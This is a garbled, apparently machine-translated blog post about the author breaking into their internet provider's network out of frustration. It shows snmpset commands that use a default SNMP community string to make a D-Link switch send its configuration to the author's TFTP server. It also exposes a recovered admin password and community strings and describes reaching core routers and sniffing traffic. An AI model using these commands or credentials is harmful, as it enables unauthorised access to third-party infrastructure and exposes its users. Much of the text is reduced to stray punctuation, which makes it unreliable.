Background
Just a few months ago, home Internet began to work, one might say - terribly. This happened only in the evenings: just at the time when the provider did not have a specialist who could make a trip and deal with this annoying problem. The letters and applications, oddly enough, did not give any results. According to the provider, a specialist can come during the day, but what about me during the day if the Internet does not work in the evening. So, in order to pass the time while waiting for a solution to the problem, I decided to do some research in terms of security in the network of my provider. If you are wondering what happened with this - welcome to cat.
PT0.1ENUM
I decided to start scanning from the 10.3XX0 / 24 subnet, because it glowed several times when tracing the route of packets from the LAN to the global network
80- . , , 161 - SNMP, . , public private community string , , .
PT1.1Gath
SNMP , DGS-3620-28SC - , , 20- SFP, 4 - 100/1000Base-T/SFP 4 10GBase-X SFP+. private community , snmpset.
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.3.3 a $TFTP_SERVER_IPP
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.5.3 s $FILE_NAME.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.7.3 s config.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.8.3 i 2
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.12.3 i 3
, j admin vfrtgb45switch( ), community strings vfrtgb45switch vfrtgb45switchrw . , , The Dude . , - MNGT vlan 4002 172.2X.X.0/15.
, mngt vlan - . , ARISTA-100G-CityPlace1 ARISTA-100GCityPlace2. , 50 L3 ( ), TCPDUMP .
PT2.1
, , ( , community string ), . : , . , , , . , , *** . , , . , , , . , . , " ". -, . , , "Turon Telecom" , . .
PT3.1 IT
, . , , , . : HTTP, SMTP . , IP DNS . , - . , - . , , .
PT4.1 Waiting for reaction
Now I have finished my article and am waiting for the reaction of people who will read it or the reaction of the provider itself. Thanks for attention.